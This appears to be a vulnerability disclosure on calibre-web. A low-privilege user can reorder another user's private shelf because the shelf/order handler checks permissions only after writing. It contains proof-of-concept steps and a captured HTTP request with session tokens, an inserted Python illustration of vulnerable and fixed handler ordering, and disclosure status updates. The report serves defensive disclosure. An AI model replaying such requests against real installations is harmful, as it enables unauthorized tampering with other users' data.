Improper Authorization in janeczku/calibre-web
Jan 25th 2022
With default settings, low-level users do not have permission to edit the sort order of books in another user's private shelf. However, because the permission check is performed incorrectly, the application does not enforce this.
Proof of Concept
- Step 1: Log in with the admin account and go to http://hostname:8083/admin/user/new. Create a new user "test1" with default permissions (only the "Show *" permissions).
- Step 2: As admin, create a private shelf and add books to it.
- Step 3: As test1, obtain the id of the admin's private shelf (e.g. by brute force or a data leak) and go to http://hostname:8083/shelf/order/:id (in the PoC, http://192.168.150.133:8083/shelf/order/3).
- Step 4: As test1, click Save and capture the request in Burp Suite. Modify the form data and replay the request to edit the sort order of books in shelf 3 (the admin's private shelf). Request:
POST /shelf/order/3 HTTP/1.1
Host: 192.168.150.133:8083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 110
Origin: http://192.168.150.133:8083
Connection: close
Referer: http://192.168.150.133:8083/shelf/order/3
Cookie: session=.eJwljjtuAzEMBe-iOgV_4oq-zEKkSNgIkAC7dhXk7lkj3bx5zfy0vY487-32PF750fbHaremle4oAOUMmtFjRZ_OtapnRAayJktVokyrraoMttE7oW3ahZaJEfCQoVM3zgVAsiYNjjAuiU18GLuvyezl-D5gQhGJoLYr5HXm8V_D14zzqP35_ZlflwAtGIiKZkXxZpqDJ-lanmEis_fZC9vvH4AIP8o.Ye-55g.y2WeHCTSR6u3ZeXWL6zHGWmQWh4; remember_token=3|a0ad3ac22b2a1c95b6d18388d0186fbcd887a7b02378a4bb2498dc8a32770e173b14bae215b37137207d498cc4a6bdfd8c1b0784ee2f81085bebf3e6d3006edd
Upgrade-Insecure-Requests: 1

1=2&2=1&csrf_token=IjA2ZjA4MTE2MTk5ZjJjZjA4MTJhODNhMjZkZGJlYzk0NGE1NWE1ZjEi.Ye-55g.t3T1U1i3rXOQoAK-1Wi6sUtXm1I
- PoC: https://drive.google.com/file/d/1iyO9WntPQq7b_2EXq76JZz3vT89jOnP4
At line 362 (https://github.com/janeczku/calibre-web/blob/master/cps/shelf.py#L362), the server checks only the request method (POST) and processes the submitted data directly, without checking whether the user is allowed to edit the shelf. I recommend moving the user permission check (https://github.com/janeczku/calibre-web/blob/master/cps/shelf.py#L380) to the top of the order_shelf function.
A low-level user can edit the sort order of books in any shelf (including the private shelf of another user).
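The following is an added illustration, not calibre-web's own code: a simplified model of the handler ordering described above, showing the vulnerable shape (the POST branch writes before the authorization check) beside the recommended shape (authorize first). The User, Shelf and check_shelf_edit_permissions names are assumptions chosen for the example.

```python
from dataclasses import dataclass, field
from typing import Dict, Tuple

# Simplified stand-ins for the application's objects (assumed names, not calibre-web's classes).
@dataclass
class User:
    id: int
    is_admin: bool = False

@dataclass
class Shelf:
    id: int
    user_id: int                                   # owner of the shelf
    order: Dict[int, int] = field(default_factory=dict)  # book_id -> position

def check_shelf_edit_permissions(user: User, shelf: Shelf) -> bool:
    """Only the owner (or an admin) may change a shelf's contents or ordering."""
    return shelf.user_id == user.id or user.is_admin

def apply_order(shelf: Shelf, form: Dict[str, str]) -> None:
    """Apply posted 'book_id=position' pairs, the same shape as '1=2&2=1' in the PoC.
    Non-numeric keys such as csrf_token are ignored."""
    for book_id, position in form.items():
        if book_id.isdigit() and position.isdigit():
            shelf.order[int(book_id)] = int(position)

def order_shelf_vulnerable(user: User, shelf: Shelf, method: str,
                           form: Dict[str, str]) -> Tuple[int, Shelf]:
    """Bug pattern from the report: the POST branch persists the new order
    before the permission check that only guards the later page rendering."""
    if method == "POST":
        apply_order(shelf, form)          # any logged-in user reaches this write
    if not check_shelf_edit_permissions(user, shelf):
        return 403, shelf                 # too late: the order was already changed
    return 200, shelf

def order_shelf_fixed(user: User, shelf: Shelf, method: str,
                      form: Dict[str, str]) -> Tuple[int, Shelf]:
    """Recommended fix: authorize before any state change, regardless of method."""
    if not check_shelf_edit_permissions(user, shelf):
        return 403, shelf                 # rejected before touching the shelf
    if method == "POST":
        apply_order(shelf, form)
    return 200, shelf
```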
We are processing your report and will contact the janeczku/calibre-web team within 24 hours.
We have sent a fix follow up to the janeczku/calibre-web team. We will try again in 7 days.
We have sent a second fix follow up to the janeczku/calibre-web team. We will try again in 10 days.
We have sent a third and final fix follow up to the janeczku/calibre-web team. This report is now considered stale.